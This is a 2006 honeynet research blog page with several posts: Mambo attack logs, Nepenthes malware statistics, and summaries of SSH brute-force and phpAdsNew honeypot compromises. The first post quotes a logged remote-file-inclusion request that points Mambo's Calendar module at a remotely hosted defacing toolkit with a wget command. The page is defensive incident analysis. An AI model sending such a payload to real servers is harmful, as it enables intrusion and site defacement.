Defacing Tool 2.0 by r3v3ng4ns

Thursday, August 31. 2006
Besides the compromises of the high-interaction honeypots, we see also quite a few automated attacks. In particular, I see quite a few scanning attempts for vulnerable web applications - phpMyAdmin and Mambo is clearly dominating. The Mambo attacks look like the following:
[Sun Aug 27 14:58:59 2006] [error] [client 195.86.124.210] File does not exist:

 /XXX/htdocs/components, referer: http://XXX.128.12.35/components/com_calendar.php?

absolute_path=http://www.freewebtown.com/england90/tool25.gif?&cmd=wget

This is related to a vulnerability in the Calendar module of Mambo <= 1.5.7 which leads to the possibility of remote file inclusion, as seen in the request (http://www.freewebtown.com/england90/tool25.gif). tool25.gif itself is a defacing toolkit, the same as previously mentioned by the Philippine Honeynet Project and ISC. The attackers just use a different site to host the toolkit and the configuration file (therules25.gif - http://www.freewebtown.com/england90/therules25.gif).

I uploaded the files at http://honeyblog.org/junkyard/web-based/ in a sanitized form. If you want the complete files, just write me an e-mail (thorsten [dot] holz [at] gmail [dot] com).
Posted by Thorsten Holz in honeynets at 19:13 | Comments (0) | Trackbacks (0)

Nepenthes Statistics

Thursday, August 31. 2006
We still run a rather large nepenthes sensor which monitors a /18 network of continouos IP space. Here are some statistics for this sensor:

General Information
First entry in nepenthes database2006-05-15 15:21:49
Total number of hits4,761,665
Number of unique IPs40,556
Number of unique malware4,865


Top 10 Malware
NumberMalware nameNumber of hits
1W32/Parite940
2Worm.Padobot.M739
3Worm/Doomber.D631
4Worm/Korgo.U509
5Trojan.Gobot-3422
6Worm.Padobot.P415
7Worm.Padobot.N384
8Trojan.Gobot-4366
9Backdoor.Gobot.S332
10Worm/Padobot.P329
Posted by Thorsten Holz in honeynets, malware at 00:04 | Comments (0) | Trackbacks (0)

Summarized Honeypot Compromises

Wednesday, August 30. 2006
The last blog postings described several honeypot compromises in more detail. In total, there were seven honeypot compromises in the first half of 2006 (diploma thesis of Jan Göbel). The following table summarizes these incidents, together with a brief description of each compromise:

Operating SystemVulnerability usedActions
1Red Hat 8.0weak passwordSSH scans
2Suse 9.1web applicationIRC proxy installation
3Red Hat 8.0web applicationphishing / scanning
4Suse 9.1web applicationphishing
5Red Hat .0weak passworduser-space IRC bot
6Red Hat 8.0weak passwordphishing
7Suse 9.1web applicationnone


The attack vectors used to compromise these honeypots were either weak passwords (SSH brute force scans) or vulnerable web applications. So none of the vulnerabilities present in these rather old Linux distributions were used. In the future, we will examine the threat posed by web applications in more detail, mainly focussing on phpMyAdmin and XMLRPC. So stay tuned for further reports :-)
Posted by Thorsten Holz in honeynets at 15:47 | Comments (2) | Trackbacks (0)

Honeypot Compromises III

Friday, August 18. 2006
We continue our tour of compromised honeypots at the German Honeynet Project, which all happened while Jan Göbel was mainly responsible for the honeypots. Back in April 2006, a honeypot running RedHat 8.0 was compromised due to a weak user password. Presumably you see quite frequently SSH brute-force attacks against your systems. And this blog post is about what can happen if one of your users has a weak password...

Introduction:
On 3rd April 2006, our Red Hat 8.0 based Honeypot was compromised, due to weak SSH passwords of both a user and the root account. Together with the Honeywall logfiles and the information gathered from the Honeypot itself, we will try to reconstruct the events that lead to the take over, as well as what modifications the intruder did to the system.
The intruder initiated a SSH brute force attack on the Honeypot, shortly after midnight. The attack originated from the university host in Norway (witch.xxx.no). Many different username and password combinations were tried, until the intruder finally managed to login as the root user. Once the system was compromised, several tools were downloaded from different webservers to facilitate the malicious actions of the attacker. Among these tools, were some SSH scanners, an IRC client and a rootkit. The Honeypot was then misused to scan for more weak SSH passwords on other systems. Besides the rootkit (zk.tgz), a backdoor was installed, listening to port 3209. Thus, the attacker was able to return to the Honeypot at any time and unnoticed. Additionally, the intruder tried to download the movie “Get Rich Or Die Tryin (Spanish)”, but failed to do so. At about 17:30:27 p.m., it was decided to shutdown the Honeypot and start the indepth investigation.

The complete write-up is available in PDF format.
Posted by Thorsten Holz in honeynets at 20:42 | Comments (0) | Trackback (1)

Honeypot Compromises II

Wednesday, August 16. 2006
There was another compromise of our honeypots in May 2006. This time, the affected honeypot was running Red Hat 8.0 and an older version of phpAdsNew was the infection vector. Several SSH bruteforce scanner and other tools were used by the attacker - read the full analysis for a complete timeline.


Motivation:
On May 7th 2006 our Red Hat 8.0 based Honeypot was attacked and successfully compromised,
by exploiting a vulnerability in an installed web application, named phpAdsNew. The
vulnerability allows a remote attacker to execute arbitrary commands, with the privileges of the
webserver on the victim host. This flaw is due to an unspecified error in the XML-RPC library
for PHP. It was first discovered in July 2005 and affects all phpAdsNew versions up to 2.0.5.

The full analysis was written by Jan Göbel during his thesis work.
Posted by Thorsten Holz in honeynets at 19:13 | Comments (0) | Trackbacks (0)
(Page 1 of 2, totaling 9 entries) » next page